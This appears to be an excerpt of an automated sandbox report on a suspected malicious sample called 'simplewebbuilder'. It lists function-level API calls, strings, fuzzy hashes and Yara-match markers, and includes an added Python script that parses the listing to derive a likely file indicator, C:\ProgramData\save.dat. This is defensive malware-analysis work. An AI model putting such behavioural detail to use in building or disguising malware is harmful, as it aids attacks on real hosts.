• API String ID: 2782032738-0
• Opcode ID: 41e168db359cd1c9f07d59c3f71d26477c26a2a79f102e3ff21314e00bb1a24e
• Instruction ID: 2134e423465d06169d69f33f949d8e277997575c9b373155c3f35de608b2603f
• Opcode Fuzzy Hash: 41e168db359cd1c9f07d59c3f71d26477c26a2a79f102e3ff21314e00bb1a24e
• Instruction Fuzzy Hash: FE41B571F00606ABDB18CEA9C890F6E7BA9AF84350B24C53DE416C7690D771DF418B52
Uniqueness

Uniqueness Score: -1.00%

APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009D054B
• __isleadbyte_l.LIBCMT ref: 009D0579
• MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 009D05A7
• MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 009D05DD
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: b48c5cfd4bd48c3613baad1b331e301716a8a0bb54ced3b50d218335d1d6671f
• Instruction ID: 71b8020a444bc7b4c7821ec780b9429d40298daa45affdb7a73b2100b2ac58ab
• Opcode Fuzzy Hash: b48c5cfd4bd48c3613baad1b331e301716a8a0bb54ced3b50d218335d1d6671f
• Instruction Fuzzy Hash: 4E31C431684246EFDB21CF66E844BAA7FA9FF81310F15842AFC55872A0D730E851DF50
Uniqueness

Uniqueness Score: -1.00%

APIs
• htons.WS2_32(?), ref: 009B3DA2
  • Part of subcall function 009B3BD3: __EH_prolog.LIBCMT ref: 009B3BD8
  • Part of subcall function 009B3BD3: std::bad_exception::bad_exception.LIBCMT ref: 009B3BED
• htonl.WS2_32(00000000), ref: 009B3DB9
• htonl.WS2_32(00000000), ref: 009B3DC0
• htons.WS2_32(?), ref: 009B3DD4
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
• String ID:
• API String ID: 3882411702-0
• Opcode ID: 012c250de2d475e1614741cd810dd9898eccaadc031d0571b32e94f31ea28318
• Instruction ID: 1fac29aa1a720319530a4e020f4321de9837db7c664658af191ca170dd7a76e1
• Opcode Fuzzy Hash: 012c250de2d475e1614741cd810dd9898eccaadc031d0571b32e94f31ea28318
• Instruction Fuzzy Hash: 5511CE36614209EFCF01DFA4D985AAAB7B8EF48324F00C056FD04DF252DA719A44D7A1
Uniqueness

Uniqueness Score: -1.00%

APIs
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 009B23D0
• RtlEnterCriticalSection.NTDLL(?), ref: 009B23DE
• InterlockedExchange.KERNEL32(?,00000001), ref: 009B2401
• RtlLeaveCriticalSection.NTDLL(?), ref: 009B2408
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
• String ID:
• API String ID: 4018804020-0
• Opcode ID: 65ce94b1171da376db7850e524c4544cf455608c8b9a69998194196da2b0b332
• Instruction ID: b8b7bbf6e6724bf89c50f8dfc8e6913145a53a331143b668d7fd6ada9f74aa44
• Opcode Fuzzy Hash: 65ce94b1171da376db7850e524c4544cf455608c8b9a69998194196da2b0b332
• Instruction Fuzzy Hash: F811AC31201204ABDB109F60CA84BABBBBDFF54B14F10406DE9019A121EBB5E845DBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction ID: ede7b0af73c53a1a01ae73da4e0c72b1db3e6396aefa23040ec32a8a60b10fd3
• Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction Fuzzy Hash: CD01437280414DBBCF165E94DC41EEE3F26BF59354B548419FE2856031D336C971AB82
Uniqueness

Uniqueness Score: -1.00%

APIs
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009B24A9
• RtlEnterCriticalSection.NTDLL(?), ref: 009B24B8
• InterlockedExchange.KERNEL32(?,00000001), ref: 009B24CD
• RtlLeaveCriticalSection.NTDLL(?), ref: 009B24D4
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
• String ID:
• API String ID: 4018804020-0
• Opcode ID: c4cc2b672545ae76fec516ed0ff490480e57863dda401816f8130fd1a237ab3a
• Instruction ID: 57675e3f545583b31e8b0daf9815d39f91073bbf79ed19a2e2de3cb897cd94b3
• Opcode Fuzzy Hash: c4cc2b672545ae76fec516ed0ff490480e57863dda401816f8130fd1a237ab3a
• Instruction Fuzzy Hash: 01F03C72145205AFDB00AF65EC85FDABBACFF49710F04801AFA04C6152DB71E994DBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 009B2009
• RtlDeleteCriticalSection.NTDLL(?), ref: 009B2028
• CloseHandle.KERNEL32(00000000), ref: 009B2037
• CloseHandle.KERNEL32(00000000), ref: 009B204E
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CriticalDeleteH_prologSection
• String ID:
• API String ID: 2456309408-0
• Opcode ID: 7d4e80214fac3738723d9b44de13876e78d5d5b4123fcc2f858a2634093e3d5d
• Instruction ID: 8908a1c62fcaa55735731b65807c01a61f970bfec534803df5a5220dd4c97a32
• Opcode Fuzzy Hash: 7d4e80214fac3738723d9b44de13876e78d5d5b4123fcc2f858a2634093e3d5d
• Instruction Fuzzy Hash: FD018171445614DBC734AF64E908BDAB7F8FF08715F00852EF44692AA1CBB46948CB50
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: Event$H_prologSleep
• String ID:
• API String ID: 1765829285-0
• Opcode ID: e4a2a4f5adbff19b14f71e69ec0a7fe53d631766c134a9953a8a3c0ba494b95d
• Instruction ID: d42eb2c3f1b4fa876a2563e5c8634936e3a3d7f3301c333bc214c76876bed5d5
• Opcode Fuzzy Hash: e4a2a4f5adbff19b14f71e69ec0a7fe53d631766c134a9953a8a3c0ba494b95d
• Instruction Fuzzy Hash: DEF03036695510DFCB009F94DC88B99BBA4FF09312F00816AF5199B391CB359844DB55
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: H_prolog_memmove
• String ID: &'
• API String ID: 3529519853-655172784
• Opcode ID: 345cad969aa5ebb9256e554040faf9afb7deed60309a1ce321025110031f3c64
• Instruction ID: 270e798b1e24b1f1e65b0118d880e735bbce9f7e656284c44efb7f2fdd481aab
• Opcode Fuzzy Hash: 345cad969aa5ebb9256e554040faf9afb7deed60309a1ce321025110031f3c64
• Instruction Fuzzy Hash: 6F618271D00209DFCF20DFA4CA81BEEBBB9AF98320F14416EE405AB151EB709E45CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCPInfo.KERNEL32(?,00000000), ref: 00406596
Strings
Memory Dump Source
• Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Info
                                                                                                                            • String ID: $
                                                                                                                            • API String ID: 1807457897-3032137957
                                                                                                                            • Opcode ID: ba08f3b65c0e88e37f7fd760be67015dd5319168190d03478502dac84fc88c2d
                                                                                                                            • Instruction ID: ecf7deb6fed8900c4d79a36e1d1ce5f6dbda1fd4730ae83dc28ca19186aff87e
                                                                                                                            • Opcode Fuzzy Hash: ba08f3b65c0e88e37f7fd760be67015dd5319168190d03478502dac84fc88c2d
                                                                                                                            • Instruction Fuzzy Hash: 4D415B31000258AAEB119718DD99BFB3FE8DB01700F1505F6D547F71D2C37A49A4CB6A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

APIs
• WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,009B89C9,?,?,00000000), ref: 009B9CC6
• getsockname.WS2_32(?,?,?), ref: 009B9CDC
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Similarity
• API ID: ErrorLastgetsockname
• String ID: &'
• API String ID: 566540725-655172784
• Opcode ID: c9734c46c139c900420d912b3295ce7ed20ca17332c076671d9dba3f6730c0ef
• Instruction ID: d22960a8dbaba15150186558aede0afd83774a46bd4e55b3ec3d940a3f7a18a5
• Opcode Fuzzy Hash: c9734c46c139c900420d912b3295ce7ed20ca17332c076671d9dba3f6730c0ef
• Instruction Fuzzy Hash: 5021A172A14208AFCB10DF68D945ACEBBF4FF4C320F20842AE918EB281D734E9458791
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 009BD2AA
  • Part of subcall function 009BD886: std::exception::exception.LIBCMT ref: 009BD8B5
  • Part of subcall function 009BE03C: __EH_prolog.LIBCMT ref: 009BE041
  • Part of subcall function 009C414C: _malloc.LIBCMT ref: 009C4164
  • Part of subcall function 009BD8E5: __EH_prolog.LIBCMT ref: 009BD8EA
Strings
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 009BD2E7
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 009BD2E0
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
• API String ID: 1953324306-1943798000
• Opcode ID: e691cc602fd1fa27ce8f8e96f08ed1cf1802e6e388a48d20676dd1421f807332
• Instruction ID: 19dd3587c2ec1452e27156cd75b9254c64c778f70ff2379891545affdf373b63
• Opcode Fuzzy Hash: e691cc602fd1fa27ce8f8e96f08ed1cf1802e6e388a48d20676dd1421f807332
• Instruction Fuzzy Hash: 1A21DD71D05248AADB14EFE8D955BEEBBB8EF94314F00805EF815AB381EB705A04CB52
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 009BD39F
  • Part of subcall function 009BD95D: std::exception::exception.LIBCMT ref: 009BD98A
  • Part of subcall function 009BE173: __EH_prolog.LIBCMT ref: 009BE178
  • Part of subcall function 009C414C: _malloc.LIBCMT ref: 009C4164
  • Part of subcall function 009BD9BA: __EH_prolog.LIBCMT ref: 009BD9BF
Strings
• C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 009BD3DC
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 009BD3D5
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Similarity
• API ID: H_prolog$_mallocstd::exception::exception
• String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
• API String ID: 1953324306-412195191
• Opcode ID: 7498f3fdf828b49147973583c797bd6db621dcbd59e2b5bf303044eff28c57af
• Instruction ID: b292e2af1b97ad2e41c61b7a1577e946bcd6c9bf1fe3ec6cde6a8d59625b3480
• Opcode Fuzzy Hash: 7498f3fdf828b49147973583c797bd6db621dcbd59e2b5bf303044eff28c57af
• Instruction Fuzzy Hash: A2210170D052089ADB14EFE8D951BEEBBB8EF80314F04811DF909AB391DFB05A04CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• _malloc.LIBCMT ref: 009B5471
  • Part of subcall function 009C35AC: __FF_MSGBANNER.LIBCMT ref: 009C35C3
  • Part of subcall function 009C35AC: __NMSG_WRITE.LIBCMT ref: 009C35CA
  • Part of subcall function 009C35AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 009C35EF
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 009B5483
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Similarity
• API ID: AllocateFolderHeapPathSpecial_malloc
• String ID: \save.dat
• API String ID: 4128168839-3580179773
• Opcode ID: f44aa84d608fe26621d2ee4b5771b99d7ceecb418d2c4054fd9f88319b1ac62e
• Instruction ID: d59e0574f9544d891c0111fe3ac9be02b5b2ccaa600d0e4478fa272a67058292
• Opcode Fuzzy Hash: f44aa84d608fe26621d2ee4b5771b99d7ceecb418d2c4054fd9f88319b1ac62e
• Instruction Fuzzy Hash: FA1190329096413BDB259F65CD81FEFBF6BDFC2760B1581ADF8455B202D5720E42C6A0
Uniqueness
Uniqueness Score: -1.00%
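The function at 009B5471 above calls SHGetSpecialFolderPathA with csidl 0x23, which is CSIDL_COMMON_APPDATA (C:\ProgramData on a default install), and fCreate 0, and the same function carries the literal "\save.dat"; the likely on-disk artifact is therefore C:\ProgramData\save.dat. The Python below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses the report's API-call lines into structured records, decodes the CSIDL argument (masking off the CSIDL_FLAG_* bits in the high byte) and joins the resolved folder with backslash-prefixed string literals from the same function to produce a path a responder can check. The sample lines are copied from the listing above; the default folder locations are an assumption for a standard Windows install, and per-user folders are left as environment references because they depend on the account the sample ran under.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One "• Name.MODULE(args), ref: ADDR" line from the report's APIs table.
# Subcall lines carry a "Part of subcall function ADDR:" prefix; args may be absent.
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[\w:@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]      # None where the report prints "?" (not recovered statically)
    ref: int                       # address of the call site
    subcall: Optional[int] = None  # callee address for "Part of subcall function" lines


def parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for a report API line, or None for headers and other text."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [parse_arg(t) for t in raw.split(",")] if raw else []
    return ApiCall(
        name=m.group("name"),
        module=m.group("module"),
        args=args,
        ref=int(m.group("ref"), 16),
        subcall=int(m.group("sub"), 16) if m.group("sub") else None,
    )


# CSIDL_FLAG_CREATE (0x8000), CSIDL_FLAG_DONT_VERIFY (0x4000) and friends live in the high byte.
CSIDL_FLAG_MASK = 0xFF00

CSIDL_NAMES = {
    0x00: "CSIDL_DESKTOP", 0x05: "CSIDL_PERSONAL", 0x07: "CSIDL_STARTUP",
    0x18: "CSIDL_COMMON_STARTUP", 0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA",
    0x23: "CSIDL_COMMON_APPDATA", 0x24: "CSIDL_WINDOWS", 0x25: "CSIDL_SYSTEM",
    0x26: "CSIDL_PROGRAM_FILES", 0x28: "CSIDL_PROFILE",
}

# Assumed default locations (Vista and later). Per-user folders are left as environment
# references because the concrete path depends on which account ran the sample.
DEFAULT_PATHS = {
    "CSIDL_DESKTOP": r"%USERPROFILE%\Desktop",
    "CSIDL_PERSONAL": r"%USERPROFILE%\Documents",
    "CSIDL_STARTUP": r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup",
    "CSIDL_COMMON_STARTUP": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp",
    "CSIDL_APPDATA": r"%APPDATA%",
    "CSIDL_LOCAL_APPDATA": r"%LOCALAPPDATA%",
    "CSIDL_COMMON_APPDATA": r"C:\ProgramData",
    "CSIDL_WINDOWS": r"C:\Windows",
    "CSIDL_SYSTEM": r"C:\Windows\System32",
    "CSIDL_PROGRAM_FILES": r"C:\Program Files",
    "CSIDL_PROFILE": r"%USERPROFILE%",
}


def decode_csidl(value: int) -> str:
    """Name the folder selected by a csidl argument, ignoring the CSIDL_FLAG_* bits."""
    folder = value & ~CSIDL_FLAG_MASK
    return CSIDL_NAMES.get(folder, f"CSIDL_0x{folder:02X}")


def derive_file_iocs(calls: List[ApiCall], strings: List[str]) -> List[str]:
    """Join each SHGetSpecialFolderPath{A,W} call whose csidl was recovered with the
    backslash-prefixed literals of the same function. fCreate (arg 3) == 0 means the
    folder is not created when missing, so the file only appears where it already exists."""
    iocs = []
    for c in calls:
        if c.name not in ("SHGetSpecialFolderPathA", "SHGetSpecialFolderPathW"):
            continue
        if len(c.args) < 3 or c.args[2] is None:
            continue
        base = DEFAULT_PATHS.get(decode_csidl(c.args[2]))
        if base is None:
            continue
        iocs.extend(base + s for s in strings if s.startswith("\\"))
    return iocs


# Constructed sample: the APIs table and String ID of the function at 009B5471 as printed above.
SAMPLE_API_LINES = [
    "• _malloc.LIBCMT ref: 009B5471",
    "  • Part of subcall function 009C35AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 009C35EF",
    "• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 009B5483",
]
SAMPLE_STRINGS = ["\\save.dat"]


def analyse(lines: List[str], strings: List[str]):
    calls = [c for c in (parse_api_line(l) for l in lines) if c is not None]
    return calls, derive_file_iocs(calls, strings)


if __name__ == "__main__":
    calls, iocs = analyse(SAMPLE_API_LINES, SAMPLE_STRINGS)
    for c in calls:
        print(f"{c.ref:08X} {c.name}.{c.module} args={c.args}")
    print("candidate artifact paths:", iocs)
```

Run on the listing above, the SHGetSpecialFolderPathA call resolves to CSIDL_COMMON_APPDATA and the derived path is C:\ProgramData\save.dat, which is the file to look for on a host suspected of running this payload; the getsockname and Boost exception functions elsewhere in this section produce no path candidates and are parsed as plain call records.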

APIs
• __EH_prolog.LIBCMT ref: 009B396A
• std::runtime_error::runtime_error.LIBCPMT ref: 009B39C1
  • Part of subcall function 009B1410: std::exception::exception.LIBCMT ref: 009B1428
  • Part of subcall function 009BAC14: __EH_prolog.LIBCMT ref: 009BAC19
  • Part of subcall function 009BAC14: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009BAC28
  • Part of subcall function 009BAC14: __CxxThrowException@8.LIBCMT ref: 009BAC47
Strings
• Day of month is not valid for year, xrefs: 009B39AC
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Similarity
• API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Day of month is not valid for year
• API String ID: 1404951899-1521898139
• Opcode ID: 6afaa85bb686a2c56dbe474af92bf8504d889fc6572684180b0d46e6e73f1fe8
• Instruction ID: b0486f97807d35a64a77284e2746444d210c26cf54a277bcf952a021df36b3c6
• Opcode Fuzzy Hash: 6afaa85bb686a2c56dbe474af92bf8504d889fc6572684180b0d46e6e73f1fe8
• Instruction Fuzzy Hash: 5001B176914209EACF04EFA4D902AEEBBB9FF98720F40851BF81093300EB744A55C7A5
Uniqueness
Uniqueness Score: -1.00%

APIs
• std::exception::exception.LIBCMT ref: 009C010D
• __CxxThrowException@8.LIBCMT ref: 009C0122
  • Part of subcall function 009C414C: _malloc.LIBCMT ref: 009C4164
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Similarity
• API ID: Exception@8Throw_mallocstd::exception::exception
• String ID: bad allocation
• API String ID: 4063778783-2104205924
• Opcode ID: 75031b50ee28827a87dd74d6b204a3ea5dca3877e4793593c5ceb873dbb55fda
• Instruction ID: 465a3fc0647f18e844fd9e5445df4218b2415d0e626506a03238affdba8e004b
• Opcode Fuzzy Hash: 75031b50ee28827a87dd74d6b204a3ea5dca3877e4793593c5ceb873dbb55fda
• Instruction Fuzzy Hash: 75F0AE70A44309979F14FA988856FEF73EC9B44314F500519B415D3AC1EFB0E900C2A5
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 009B3C1B
• std::bad_exception::bad_exception.LIBCMT ref: 009B3C30
  • Part of subcall function 009C2AB7: std::exception::exception.LIBCMT ref: 009C2AC1
  • Part of subcall function 009BAC4D: __EH_prolog.LIBCMT ref: 009BAC52
  • Part of subcall function 009BAC4D: __CxxThrowException@8.LIBCMT ref: 009BAC7B
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Similarity
• API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
• String ID: bad cast
• API String ID: 1300498068-3145022300
• Opcode ID: c0ed64162976b0ad1666d9c9feb6d8a1876fce47d8d10449e3a2f2fd8698c647
• Instruction ID: 22a42e1f17d3f94a66c9aaa26463b8366cc67f28a5cbb52e5d159cf7db0eb0d2
• Opcode Fuzzy Hash: c0ed64162976b0ad1666d9c9feb6d8a1876fce47d8d10449e3a2f2fd8698c647
• Instruction Fuzzy Hash: E2F0A732940504CBC719EF54D541BDABB78EF96321F00816EFD055B351CBB29A05C791
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 009B3886
• std::runtime_error::runtime_error.LIBCPMT ref: 009B38A5
  • Part of subcall function 009B1410: std::exception::exception.LIBCMT ref: 009B1428
  • Part of subcall function 009B8F82: _memmove.LIBCMT ref: 009B8FA2
Strings
• Day of month value is out of range 1..31, xrefs: 009B3894
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Similarity
• API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Day of month value is out of range 1..31
• API String ID: 3258419250-1361117730
• Opcode ID: 6d83bc1cc12e6c89a1d33ba70c53521d237c97f729a302ce74bc86b9af2ecb8d
• Instruction ID: d0253ade590db44a47d61e60370cb78383534c7788dcd158a3225b6dcc3ee108
• Opcode Fuzzy Hash: 6d83bc1cc12e6c89a1d33ba70c53521d237c97f729a302ce74bc86b9af2ecb8d
• Instruction Fuzzy Hash: E4E0D832A842049BC728BF94C9127EDB7B8DB48B24F40855FF40167381DEB12944C7D0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 009B38D2
• std::runtime_error::runtime_error.LIBCPMT ref: 009B38F1
  • Part of subcall function 009B1410: std::exception::exception.LIBCMT ref: 009B1428
  • Part of subcall function 009B8F82: _memmove.LIBCMT ref: 009B8FA2
Strings
• Year is out of valid range: 1400..10000, xrefs: 009B38E0
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Similarity
• API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Year is out of valid range: 1400..10000
                                                                                                                            • API String ID: 3258419250-2344417016
                                                                                                                            • Opcode ID: b7d2fbde3d8cfee26b661076f69e5e7a19986e9fc47fa717ad3f0d5526a018c5
                                                                                                                            • Instruction ID: 35b1364fa7f8e3aaedefb420775fb42e1ef8f40ef1fb22fa8ff42d008962b2b9
                                                                                                                            • Opcode Fuzzy Hash: b7d2fbde3d8cfee26b661076f69e5e7a19986e9fc47fa717ad3f0d5526a018c5
                                                                                                                            • Instruction Fuzzy Hash: A7E09232A8421497C728FB9489527EDB7A8DB4CB20F00455BF401673C1DAB12944C790
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B391E
                                                                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 009B393D
                                                                                                                              • Part of subcall function 009B1410: std::exception::exception.LIBCMT ref: 009B1428
                                                                                                                              • Part of subcall function 009B8F82: _memmove.LIBCMT ref: 009B8FA2
                                                                                                                            Strings
                                                                                                                            • Month number is out of range 1..12, xrefs: 009B392C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                            • String ID: Month number is out of range 1..12
                                                                                                                            • API String ID: 3258419250-4198407886
                                                                                                                            • Opcode ID: 69ea93efb6573f9d6ca7f715baccece87edc2c5fe5a26876b2e959d847efcd1c
                                                                                                                            • Instruction ID: cc5f6654fd2fb28b5e0a97df4a1aa07a515eaee112a997ee4234c4083128251a
                                                                                                                            • Opcode Fuzzy Hash: 69ea93efb6573f9d6ca7f715baccece87edc2c5fe5a26876b2e959d847efcd1c
                                                                                                                            • Instruction Fuzzy Hash: 8AE0D832A842049BC728BB94C9127EDB7B8DF48B20F00455FF80167381DEF12944C7D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • TlsAlloc.KERNEL32 ref: 009B19CC
                                                                                                                            • GetLastError.KERNEL32 ref: 009B19D9
                                                                                                                              • Part of subcall function 009B1712: __EH_prolog.LIBCMT ref: 009B1717
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocErrorH_prologLast
                                                                                                                            • String ID: tss
                                                                                                                            • API String ID: 249634027-1638339373
                                                                                                                            • Opcode ID: 60fc00f971304cb9838920b848c7ffb86a9c4e4006143899e4e7b4dced6970d3
